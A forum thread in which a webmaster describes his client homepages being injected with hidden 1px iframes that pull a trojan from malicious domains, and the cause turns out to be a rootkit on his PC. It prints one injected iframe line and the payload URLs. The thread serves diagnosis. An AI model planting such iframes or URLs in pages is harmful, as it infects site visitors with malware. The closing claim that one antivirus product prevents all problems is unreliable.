Hi guys!

I have a problem which I'll explain below. Please excuse if this is posted in the wrong section...

Since yesterday whenever I publish a client's website, it gets infected with a virus while being on the server.

For instance:

I upload the Homepage (index.htm) to a domain. The file seems clean with no trace of the virus. About 20 minutes later I visit that site again through my browser and voila, it now tries to download a virus file to my pc!

I viewed the source and I noticed how it installed a code by itself, similar to this:
<iframe src='http://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Sometimes there is one line, sometimes more. It gets installed by itself just under the body bg tag and then sometimes also way at the bottom of the file.

This is not a virus resident on the web server, as Ive posted sites to various web servers hosted by different ISP's in different countries. This only happens to sites that I publish.

I thought its coming from my PC but then why is it clean when I upload it, and after a while it gets infected with this script?

I downloaded the infected file via FTP and opened in Frontpage 2000, then I see nothing. In Notepad I also see nothing.

But when I open the html file in Frontpage 2002, I see in the code nothing, but in the WYSIWYG editor four small 1px x 1px blocks (iFrames) linking to http://kleman.info.

This wants to download http://81.95.146.150/mad.exe (please dont click).

Anyways, in the end I found the domain kleman.info to be hosted on a name server called deduct.biz, again hosted by TimeNet ISP in Malaysia.

Ive contacted them and will now see what happens.

Meanwhile, every index.htm homepage I publish to a client's domain, gets infected after a while, while being resident on the server. (other accounts dont get infected on the server and seems like its only the index page).

Does anyone have ANY idea on how to solve this??

Pleaese guys, your help would be much appreciated.

Seems like these guys had the same problem:
http://forums.spikedhumor.com/showthread.php?t=4559

Although no help to me though.

Thanks guys,
Barney ZAR

Most probable thing is that the server have been compromised, and the web server now add magically a link to that virus on every page that is requested through the server.

Alert your host provider, he has to run forensic and clean up his server.

hey there,

I also thought it was the server, but to test this, I have uploaded the same file to other servers in other countries with other Service Providers and it does the same?


Thanks
Barney ZAR

Then, it's either something on your pc, or in the html of the page that call that.
There is simply no other way (I know of, at least...)

Your computer is infected with spyware.

Hi guys

Yip it seems like you are right, this looks like spyware!! =(

I scanned my PC and it seems like it removed some stuff, but is there any other tips you have?

I did change my one account's password and in my FTP program (Win Commander) I took out the username of another so that you have to type it manually.

I dont know weather I should change all password or if I should just remove the stored info on my FTP program?

This is my first encounter with something like this

I doubt that it was or is connecting via FTP, spyware isn't usually written with webmasters in mind
A check on your source code from the design tool and in your browser will confirm where the rogue code is coming from.
If you can't see it in the source from the server, but you can in the rendered source from your browser, then it is being injected as the page is rendering/downloading. This type of scumware intercepts the code stream at HTTP client level and inserts it's own section of code which then is rendered or activated by the browser.

Ok this is what I found in the end:

I downloaded the infected index.htm file from the web server via FTP, opened in Notepad and you see nothing.

When opened in Frontpage, the code shows nothing but the WYSIWYG editor in Frontpage 2002 shows four 1px x 1px blocks, which is iFrames NOT visible in the html code. These are linked to open the following URL:

http://kleman.info

In the end it seems to want to download a mad.exe file.

Somehow these iFrame scripts its NOT visible in the code. I dont know how they manage to get this right.

To further update on the situation...

http://kleman.info is hosted on http://www.deduct.biz - this is not a virus site it seems, but rather a site to fool anyone to think that this is their ISP.

The actual ISP is located in Malaysia. Ive contacted them and now awaits their response.

I hope this helps!

Barney ZAR

Oh and btw... while the index.htm homepage is infected, everyone visiting that site could also see it.

(After the anti-virus on my PC found a trojan I removed it and re-published all index.htm files to infected domains, it now seems clean)

Quote:

Somehow these iFrame scripts its NOT visible in the code. I dont know how they manage to get this right

read post #7


It is NOT the server simply your PC that could see the issue.

Ok but the visitors to those sites could also see it ...

ie: as soon as my PC infected www.domainX.com then any visitor to that domain also complained that the site opened slowly and wanted to download some trojan virus.

I went to internet cafe and to some client machines... I checked the source code via the browser and saw the iFrame script on their PC's.


Barney ZAR

What about the hosting company - can the problem be there?

Problem solved - was a rootkit on my PC.

Thanks guys =)


Barney ZAR

Kaspersky = you wont have problems..